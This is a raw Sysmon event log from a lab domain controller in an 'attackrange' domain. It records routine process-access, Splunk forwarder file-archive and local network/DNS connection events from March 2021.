16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:14.046{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE2483ADEA1E4F7F102EB2B64B37CFE0,SHA256=9D9F87260CC640499BBFA215BAB914406168973020FE9B51D431430C55E17031,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:15.046{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21357DABD6BEAA27F7F62EC3954A9813,SHA256=408CCFDC68F7A4D31B8C7326DB447AC29CAB17AF2408C4B310FA2E748FC08FB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:16.952{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBDD0A0F3F4F06E923B7655F13231005,SHA256=92A5C58EB0C91EDF9BA90D7183F5647749EA4996156EB23AF8C42AF28427758B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:16.124{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C08C6B6A230F6E26009EB9A2B8674AB3,SHA256=AB25559FC20EFC51048C40631BA75F9D89ACD950F6D7DDDC0A03DFCAA8781D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:17.140{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40A5F98EEE0481215BFCC18248C2EFA0,SHA256=A3630C27D4D34EE40D29B195E5E192BA66858218A550655A5DF45F27B0A2620D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:18.171{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=031B9013F83301A0BEC950EC1D039D09,SHA256=985F730AE704053B21132CA804241AD3C9BCA994216DE2CE5D17251687F426B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:07.313{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60223-false10.0.1.12-8000- 23542300x80000000000000002245604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:19.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68C3EB1630615DC4D7193752E6F16B6F,SHA256=A3A6729DA8B61BD7C26E8C25EB65E868835059F2B92E19423A2E5B396C446251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:20.265{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6DCB2307154B3C7944174A2FAE55BD3,SHA256=709FF1F5376F5C4E716430EA5300976728F56E77AABA4D32B2AB7E307E188873,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:21.288{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BC06A635EEF6B087F09E4A3CAD79CF1,SHA256=D275BAA280E44F1B360107762655D3190B3DC1A358A1BA09574E497A545DE5A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:22.311{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D17FE4976E3EDB2250A26F1D524AA591,SHA256=5EA4FBF3B11A23B006A6D46A5F7B9926E729FA93FD90376DA9C1C7C215A3B3D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:22.265{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBD96005E3580EF9181488DADE21F70F,SHA256=DE915A66845E3FCED6EA2A1236B3816E9D0D9DC92CB0A6D9AE025ADFC907F684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:22.265{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C60BE33E5CA67D4EFACBAE0B751EE625,SHA256=483018CA0DF562D7F4C5CD6DAC04B9AB3AAE6070A48494FDCACBD2F17E11852D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:23.343{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4785FB7E69027D5E4D983682BBE21108,SHA256=E210FC092E9D1339F2EB1C3361A772165644ACAEBCC0F7E9DB8A2EA28C6235D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:12.344{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60224-false10.0.1.12-8000- 23542300x80000000000000002245612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:24.358{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22B803F8D1E565BEA681DA9158523E1A,SHA256=2DE7516EA309A01EC2AFA6C06CDC89ED902B626B9CC85D85954EFBFDB8E69772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:25.377{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB3C1118BA6F2CDCED8BE0DAC87CF7DC,SHA256=5AF8C6A149DC2AEF8C21F67358DD9419C3611CDAE8FFE13534A00AC652971730,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:25.140{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBD96005E3580EF9181488DADE21F70F,SHA256=DE915A66845E3FCED6EA2A1236B3816E9D0D9DC92CB0A6D9AE025ADFC907F684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:26.405{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A07CABEF7C1E31E87BFD7AC789E25BA6,SHA256=4194BD0358F2B394B2E6B042AAACA1ECD0C963FC076EB795FA8C9658F3A4812B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:15.703{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local50633- 23542300x80000000000000002245615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:26.155{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9CFC67F9F27C4C79F041875038E1C19,SHA256=386473D238D072DCED1D058F3B4F63CAC296CA6F0ADE72EF446CE8D3B7A93D92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:27.436{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC75B5FA8DB9AB3A4AC691DD65B3D221,SHA256=E1E4920481EBB9906BF19B58B8EEC1B590C8F9BBE5ACF138347056CAE874FE07,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:16.718{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local50633- 23542300x80000000000000002245622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:28.468{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05390AE3547A2F7E38881CD2DE02035F,SHA256=F38AABE5FDEFA5D15E67643ED681D8D91C278A354ADAC1C616C9FC2BEF12A6E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:18.172{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60225-false10.0.1.12-8000- 23542300x80000000000000002245620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:28.062{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E94A485C79C8E06EAA6997E4ECC2F7E,SHA256=45A060C1F1C2332152C4E270DA1DAE36AA8C4512DD299A4BF07283AEA3CF909A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 